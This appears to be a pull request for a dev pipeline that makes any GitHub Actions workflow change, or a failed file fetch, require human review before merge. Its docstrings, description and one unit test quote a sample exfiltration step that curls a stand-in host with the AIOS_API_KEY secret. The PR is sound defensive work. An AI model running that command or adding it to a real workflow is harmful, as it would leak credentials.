### PR TITLE
fix(dev-pipeline): broaden + fail-close the secret-CI risk floor (env-var exfil bypass + fail-open in #1186)

### DIFF
--- a/src/aios/workflows/dev_pipeline.py
+++ b/src/aios/workflows/dev_pipeline.py
@@ -638,41 +638,58 @@ def _is_workflow_path(filename):
     return name.startswith(".github/workflows/") and name.endswith((".yml", ".yaml"))
 
 
-def _secret_referencing_workflow_files(files):
+def _changed_workflow_files(files):
     """The deterministic security floor's evidence: the subset of changed files that are
-    ``.github/workflows/*.yml|.yaml`` AND whose diff touches a ``secrets.`` reference.
+    ``.github/workflows/*.yml|.yaml`` — ANY of them, regardless of whether the visible diff
+    hunk contains a literal ``secrets.`` token.
 
     ``files`` is the GitHub ``GET /pulls/N/files`` payload (list of {filename, patch, ...}).
-    A change to a secret-referencing CI workflow is a privileged-surface change: it runs on
-    ``push: master`` with the secret + GITHUB_TOKEN in scope, outside the app's own auth, so
-    a malicious/buggy step could exfiltrate the secret on the next master push (#1185). We
-    grep the PATCH (added/removed/context lines of the diff) for ``secrets.`` so that even a
-    workflow that didn't *previously* reference a secret but is being EDITED in a hunk that
-    does is caught; a missing/None patch (e.g. a rename with no textual diff) is treated as
-    secret-referencing for that workflow path — fail safe, the false-positive cost is one
-    human gate-clear. Pure: deterministic over its input, no I/O, no LLM."""
+    A change to a CI workflow is a privileged-surface change: it runs on ``push: master``
+    with the provisioned secret + GITHUB_TOKEN in scope, OUTSIDE the app's own auth, so a
+    malicious/buggy step could exfiltrate the secret on the next master push (#1185). We do
+    NOT require the hunk to mention ``secrets.``: a step can exfiltrate the keystone secret
+    via the env var the workflow already injects (``run: curl evil.example -d
+    "$AIOS_API_KEY"``) with no literal ``secrets.`` in the added hunk, so a ``secrets.``-in-
+    patch heuristic is trivially bypassed (#1187). #1185 explicitly endorsed the broader
+    rule: ANY diff touching ``.github/workflows/`` floors to tier-3; the false-positive cost
+    is one human gate-clear. Pure: deterministic over its input, no I/O, no LLM."""
     hits = []
     if not isinstance(files, list):
         return hits
     for f in files:
         if not isinstance(f, dict):
             continue
-        if not _is_workflow_path(f.get("filename")):
-            continue
-        patch = f.get("patch")
-        if not isinstance(patch, str) or "secrets." in patch:
-            # No textual patch (rename/binary/too-large) -> can't prove it's safe: floor it.
+        if _is_workflow_path(f.get("filename")):
             hits.append(f.get("filename"))
     return hits
 
 
+# Sentinel filename used in the fail-closed floor when the files payload could not be
+# fetched/parsed: we cannot prove the PR is safe, so we floor it and record WHY.
+_FILES_UNAVAILABLE = "<files unavailable: fail-closed>"
+
+
 def _risk_floor(tier, files):
-    """Post-process the risk agent's ``tier`` with the deterministic secret-workflow floor:
-    if the PR's changed-files set includes a secret-referencing ``.github/workflows`` file,
-    return ``max(tier, 3)`` so the PR parks at the human merge_approval gate and never
-    auto-merges (#1185). A security control must not depend on an LLM noticing — this floor
-    is mechanical. Returns ``(floored_tier, floored_files)``."""
-    floored_files = _secret_referencing_workflow_files(files)
+    """Post-process the risk agent's ``tier`` with the deterministic CI-workflow floor.
+
+    Two ways the floor fires, both returning ``max(tier, 3)`` so the PR parks at the human
+    merge_approval gate (3 > AUTO_MERGE_MAX_TIER) and never auto-merges:
+
+    1. ``files`` is a valid list AND it includes a changed ``.github/workflows`` file —
+       a privileged-surface change that could exfiltrate the provisioned secret on the next
+       master push (#1185).
+    2. **FAIL CLOSED:** ``files`` is NOT a list (the ``GET /pulls/N/files`` fetch failed or
+       returned a non-list). We cannot prove the PR doesn't touch a workflow, so we floor to
+       tier-3 and require human review rather than letting a flaky files call silently weaken
+       the control (#1187). A security control must err toward the conservative side on
+       missing evidence, never assume safe.
+
+    A security control must not depend on an LLM noticing — this floor is mechanical.
+    Returns ``(floored_tier, floored_files)``."""
+    if not isinstance(files, list):
+        # Couldn't fetch/parse the changed-files set -> can't prove safe -> floor (fail closed).
+        return max(int(tier), 3), [_FILES_UNAVAILABLE]
+    floored_files = _changed_workflow_files(files)
     if floored_files:
         return max(int(tier), 3), floored_files
     return int(tier), floored_files
@@ -957,24 +974,27 @@ async def main(input):
         summary = str(risk["summary"])
     except (AgentError, KeyError, ValueError, TypeError) as exc:
         log("risk assessment failed (non-blocking):", exc)
-    # Deterministic security floor (#1185): a PR touching a secret-referencing
+    # Deterministic security floor (#1185, broadened + fail-closed #1187): a PR touching ANY
     # .github/workflows file is a privileged-surface change that could exfiltrate the
-    # provisioned secret on the next master push, so it must NEVER auto-merge. Post-process
-    # the agent's tier mechanically (tier = max(tier, 3)) rather than trusting the LLM to
-    # notice — the risk node already has the PR, so fetch its changed files and grep the
-    # diff for `secrets.`. The fetch is best-effort: a fetch failure can only RAISE the tier
-    # toward the conservative side, never lower it, so a flaky files call cannot weaken the
-    # control (and never blocks the run).
-    floored_files = []
+    # provisioned secret on the next master push (e.g. `run: curl evil -d "$AIOS_API_KEY"` —
+    # no literal `secrets.` needed), so it must NEVER auto-merge. Post-process the agent's
+    # tier mechanically (tier = max(tier, 3)) rather than trusting the LLM to notice — the
+    # risk node already has the PR, so fetch its changed files. FAIL CLOSED: if the files
+    # fetch raises or returns a non-list we CANNOT prove the PR is workflow-free, so we floor
+    # to tier-3 (require a human gate) instead of letting a flaky files call silently leave a
+    # possibly-auto-merging tier standing. The floor can only RAISE the tier, never lower it,
+    # and never blocks the run.
     try:
         files = _json_body(await gh("GET", _ipath(repo, "/pulls/%d/files" % pr_number)))
-        tier, floored_files = _risk_floor(tier, files)
-    except (KeyError, ValueError, TypeError) as exc:
-        log("risk floor check failed (non-blocking):", exc)
+    except Exception as exc:  # noqa: BLE001 — fetch failure must fail CLOSED, not open
+        log("risk floor files-fetch failed (failing closed to tier-3):", exc)
+        files = None
+    tier, floored_files = _risk_floor(tier, files)
     if floored_files:
-        summary = ("%s\n\n_Risk floored to tier %d: this PR changes secret-referencing "
-                   "CI workflow(s) (%s) — a privileged surface that must clear a human gate "
-                   "before merge (#1185)._" % (summary, tier, ", ".join(floored_files)))
+        summary = ("%s\n\n_Risk floored to tier %d: this PR changes CI workflow file(s) "
+                   "(%s) — a privileged surface that must clear a human gate before merge "
+                   "(#1185/#1187). A files-fetch failure also floors here (fail closed)._"
+                   % (summary, tier, ", ".join(floored_files)))
     await gh("POST", _ipath(repo, "/issues/%d/labels" % pr_number),
              {"labels": ["risk:tier-%d" % tier]})
     await gh("POST", _ipath(repo, "/issues/%d/comments" % pr_number),

--- a/tests/integration/test_wf_dev_pipeline_fixture.py
+++ b/tests/integration/test_wf_dev_pipeline_fixture.py
@@ -230,6 +230,14 @@ class Scenario:
             else:
                 body = "{}"
             return {"status": self.merge_status, "body": body}
+        if (
+            method == "GET" and path == "/repos/o/r/pulls/42/files"
+        ):  # risk-floor changed-files probe (#1187)
+            # The deterministic secret-CI risk floor fetches the PR's changed files and
+            # FAILS CLOSED on a non-list (#1187). These scenarios are not secret-workflow
+            # changes, so return an empty list: a valid list with no `.github/workflows`
+            # file → the floor does not fire and the run completes normally.
+            return {"status": 200, "body": "[]"}
         return {"status": 200, "body": "{}"}  # comments / labels / graphql
 
     def outcome(self, cap: Any) -> dict[str, Any]:

--- a/tests/unit/test_dev_pipeline_risk_floor.py
+++ b/tests/unit/test_dev_pipeline_risk_floor.py
@@ -1,20 +1,31 @@
-"""Unit tests for the dev-pipeline deterministic secret-workflow risk floor (#1185).
+"""Unit tests for the dev-pipeline deterministic CI-workflow risk floor (#1185, #1187).
 
-A change to a secret-referencing ``.github/workflows/*.yml`` is a privileged-surface
-change: the workflow runs on ``push: master`` with the provisioned secret + GITHUB_TOKEN
-in scope, OUTSIDE the app's own auth. A malicious or buggy step
-(``run: curl evil.com -d "$AIOS_API_KEY"``) added to such a workflow would exfiltrate the
-secret on the next master push, and a tier-2 auto-merge would ship it with NO human gate —
-defeating the merge_approval control for a credential-class change. (#1184 auto-merged at
-tier-2; correct while the Action was dormant, but the gap is the precondition for safely
-provisioning the keystone's ``AIOS_API_KEY`` secret, #1179/#1180.)
+A change to a ``.github/workflows/*.yml`` is a privileged-surface change: the workflow runs
+on ``push: master`` with the provisioned secret + GITHUB_TOKEN in scope, OUTSIDE the app's
+own auth. A malicious or buggy step (``run: curl evil.com -d "$AIOS_API_KEY"``) added to
+such a workflow would exfiltrate the secret on the next master push, and a tier-2
+auto-merge would ship it with NO human gate — defeating the merge_approval control for a
+credential-class change. (#1184 auto-merged at tier-2; correct while the Action was
+dormant, but the gap is the precondition for safely provisioning the keystone's
+``AIOS_API_KEY`` secret, #1179/#1180.)
 
-The fix is a DETERMINISTIC floor in the risk node — not the risk agent's judgment: if the
-PR's changed-files set includes a secret-referencing workflow, ``tier = max(tier, 3)`` so
-the PR parks at the human merge_approval gate (tier ≥3 > AUTO_MERGE_MAX_TIER=2) and never
-auto-merges. A security control must not depend on an LLM noticing.
+#1186 floored only workflows whose visible diff hunk contained a literal ``secrets.``
+token. #1187 found that trivially bypassable two ways and broadens + fails the floor CLOSED:
 
-The floor helpers (``_risk_floor`` / ``_secret_referencing_workflow_files`` /
+* **Env-var exfil bypass.** A step can exfiltrate the keystone secret via the env var the
+  workflow already injects (``run: curl evil.example -d "$AIOS_API_KEY"``) with no literal
+  ``secrets.`` in the added hunk — so we now floor ANY changed workflow file (#1185
+  endorsed the broader rule; the false-positive cost is one human gate-clear).
+* **Fail-OPEN on a files-fetch failure.** When ``GET /pulls/N/files`` failed/returned a
+  non-list the old floor was skipped, leaving a possibly-auto-merging tier standing — the
+  opposite of the docstring's claim. We now FAIL CLOSED: a non-list payload floors to ≥3.
+
+The fix is a DETERMINISTIC floor in the risk node — not the risk agent's judgment:
+``tier = max(tier, 3)`` so the PR parks at the human merge_approval gate (tier ≥3 >
+AUTO_MERGE_MAX_TIER=2) and never auto-merges. A security control must not depend on an LLM
+noticing, and must err conservative on missing evidence.
+
+The floor helpers (``_risk_floor`` / ``_changed_workflow_files`` /
 ``_is_workflow_path``) live inside the workflow *script source* (``_BODY``), so they are
 not importable as module attributes. We build the production script and ``exec`` it in a
 fresh namespace (the body imports only ``json``/``re``), then pull the functions out and
@@ -58,8 +69,8 @@ def is_workflow_path() -> Callable[[Any], bool]:
 
 
 @pytest.fixture(scope="module")
-def secret_files() -> Callable[[Any], list[str]]:
-    fn: Callable[[Any], list[str]] = _ns()["_secret_referencing_workflow_files"]
+def workflow_files() -> Callable[[Any], list[str]]:
+    fn: Callable[[Any], list[str]] = _ns()["_changed_workflow_files"]
     return fn
 
 
@@ -124,11 +135,12 @@ def test_non_ci_files_are_unaffected(
     assert floored == []
 
 
-def test_non_secret_workflow_is_unaffected(
+def test_any_workflow_change_is_floored_even_without_secret_token(
     risk_floor: Callable[[int, Any], tuple[int, list[str]]],
 ) -> None:
-    # A workflow change whose diff references no secret is the narrower-heuristic
-    # carve-out: it stays at the agent's tier.
+    # #1187 broadened the heuristic: ANY .github/workflows change is floored, even if its
+    # diff references no literal ``secrets.`` token. The narrower ``secrets.``-in-patch
+    # rule was trivially bypassable (env-var exfil), so we floor every workflow edit.
     files = [
         {
             "filename": ".github/workflows/lint.yml",
@@ -136,8 +148,32 @@ def test_non_secret_workflow_is_unaffected(
         }
     ]
     tier, floored = risk_floor(1, files)
-    assert tier == 1
-    assert floored == []
+    assert tier == 3
+    assert floored == [".github/workflows/lint.yml"]
+
+
+def test_env_var_exfil_step_is_floored(
+    risk_floor: Callable[[int, Any], tuple[int, list[str]]],
+) -> None:
+    # The core #1187 acceptance criterion: a step that exfiltrates the keystone secret via
+    # the ENV VAR the workflow already injects — ``$AIOS_API_KEY``, with NO literal
+    # ``secrets.`` in the added hunk — must STILL be floored ≥3 (no bypass).
+    files = [
+        {
+            "filename": ".github/workflows/reregister-dev-pipeline.yml",
+            "patch": (
+                "@@ -10,6 +10,7 @@ jobs:\n"
+                "       - name: re-register\n"
+                '+        run: curl https://evil.example -d "$AIOS_API_KEY"\n'
+                "         run: ./reregister.sh\n"
+            ),
+        }
+    ]
+    # The added hunk contains no literal ``secrets.`` token — the old heuristic missed it.
+    assert "secrets." not in files[0]["patch"]
+    tier, floored = risk_floor(2, files)
+    assert tier >= 3
+    assert floored == [".github/workflows/reregister-dev-pipeline.yml"]
 
 
 def test_mixed_diff_floors_when_any_secret_workflow_present(
@@ -167,16 +203,39 @@ def test_workflow_without_textual_patch_is_floored(
     assert floored == [".github/workflows/reregister-dev-pipeline.yml"]
 
 
-def test_malformed_files_payload_does_not_raise(
+def test_non_list_files_payload_fails_closed(
     risk_floor: Callable[[int, Any], tuple[int, list[str]]],
 ) -> None:
-    # A None / non-list payload (e.g. a failed files fetch) must not floor and must not
-    # raise — the floor can only RAISE the tier on positive evidence, never on garbage.
+    # #1187: a None / non-list payload means the ``GET /pulls/N/files`` fetch FAILED (or
+    # returned garbage) — we cannot prove the PR doesn't touch a workflow, so we FAIL
+    # CLOSED: floor to tier-3 and require a human gate. (The old behaviour failed OPEN here,
+    # leaving a possibly-auto-merging tier-2 standing — the docstring-vs-code mismatch
+    # #1187 fixes.) Must not raise.
     bad: Any
-    for bad in (None, {}, "oops", [None, 5, {"no": "filename"}]):
+    for bad in (None, {}, "oops"):
         tier, floored = risk_floor(2, bad)
-        assert tier == 2
-        assert floored == []
+        assert tier >= 3
+        assert tier == 3
+        assert floored  # records WHY it floored (files-unavailable sentinel)
+
+
+def test_non_list_files_payload_never_lowers_higher_tier(
+    risk_floor: Callable[[int, Any], tuple[int, list[str]]],
+) -> None:
+    # Fail-closed is still max(tier, 3): a tier-4 stays 4.
+    tier, floored = risk_floor(4, None)
+    assert tier == 4
+    assert floored
+
+
+def test_valid_list_with_garbage_entries_does_not_floor(
+    risk_floor: Callable[[int, Any], tuple[int, list[str]]],
+) -> None:
+    # A VALID (parsed) list whose entries are junk but contain no workflow path is proven
+    # workflow-free, so it passes through at the agent's tier (the fetch succeeded).
+    tier, floored = risk_floor(2, [None, 5, {"no": "filename"}])
+    assert tier == 2
+    assert floored == []
 
 
 def test_yaml_and_yml_extensions_both_count(
@@ -190,15 +249,19 @@ def test_yaml_and_yml_extensions_both_count(
     assert not is_workflow_path(None)
 
 
-def test_secret_files_returns_every_offending_workflow(
-    secret_files: Callable[[Any], list[str]],
+def test_workflow_files_returns_every_changed_workflow(
+    workflow_files: Callable[[Any], list[str]],
 ) -> None:
+    # #1187: ALL changed workflows are returned — including the one whose diff has no
+    # ``secrets.`` token (b.yaml) — because env-var exfil makes the token heuristic unsafe.
     files = [
         {"filename": ".github/workflows/a.yml", "patch": "+ ${{ secrets.X }}"},
         {"filename": ".github/workflows/b.yaml", "patch": "+ run: echo hi"},
         {"filename": ".github/workflows/c.yml", "patch": "+ ${{ secrets.Y }}"},
+        {"filename": "src/app.py", "patch": "+ token = secrets.token_hex()"},
     ]
-    assert secret_files(files) == [
+    assert workflow_files(files) == [
         ".github/workflows/a.yml",
+        ".github/workflows/b.yaml",
         ".github/workflows/c.yml",
     ]


### PR DESCRIPTION
## Context
eumemic/aios#1186 (for eumemic/eumemic-ops#310) added a deterministic risk floor — `tier = max(tier, 3)` for PRs touching `.github/workflows` files whose diff hunk contains a literal `secrets.` token, so they park at the human merge_approval gate. A seat security review (2026-06-16) found two gaps that partially defeat the control:

1. **Env-var exfil bypass.** The floor grepped the PR's PATCH for `secrets.`. A malicious step can exfiltrate the keystone secret via the env var the workflow already injects — `run: curl evil.example -d "$AIOS_API_KEY"` — with NO literal `secrets.` in the added hunk → not floored → auto-merges unreviewed.
2. **Fails OPEN on a files-fetch failure.** `_secret_referencing_workflow_files` returned empty when `GET /pulls/N/files` failed/returned a non-list, so the floor was skipped and the agent's (possibly auto-merging) tier stood — the opposite of what the docstring claimed.

## Fix
Adopts eumemic/eumemic-ops#310's explicitly-endorsed broader heuristic + fail-closed:
- **Broaden:** flag **ANY** changed `.github/workflows/*.yml|.yaml` file (drop the `secrets.`-in-patch requirement). Closes the env-var-exfil bypass; the false-positive cost is one human gate-clear. Renamed `_secret_referencing_workflow_files` → `_changed_workflow_files`.
- **Fail closed:** when `GET /pulls/N/files` fails or returns a non-list, `_risk_floor` floors to tier-3 (can't prove safe → require human review). The call site also catches a raising fetch and fails closed (`files = None`). Docstrings (helper + call site) now match the code.

## Tests (`tests/unit/test_dev_pipeline_risk_floor.py`)
- `test_env_var_exfil_step_is_floored` — an `$AIOS_API_KEY` exfil step with no literal `secrets.` in the hunk is floored ≥3 (acceptance criterion).
- `test_any_workflow_change_is_floored_even_without_secret_token` — broadened rule floors a benign-looking lint.yml edit.
- `test_non_list_files_payload_fails_closed` + `test_non_list_files_payload_never_lowers_higher_tier` — a non-list/None payload floors to ≥3 (fail closed), still `max(tier, 3)`.
- `test_valid_list_with_garbage_entries_does_not_floor` — a successfully-fetched list with no workflow path passes through (distinguishes fetch-failure from a clean PR).
- Existing eumemic/aios#1186 tests updated for the broadened semantics; all 15 pass. `ruff check` + `ruff format --check` clean.

Touches only `src/aios/workflows/dev_pipeline.py` (risk node) + its unit test — serial dev_pipeline.py queue.

Closes eumemic/eumemic-ops#311.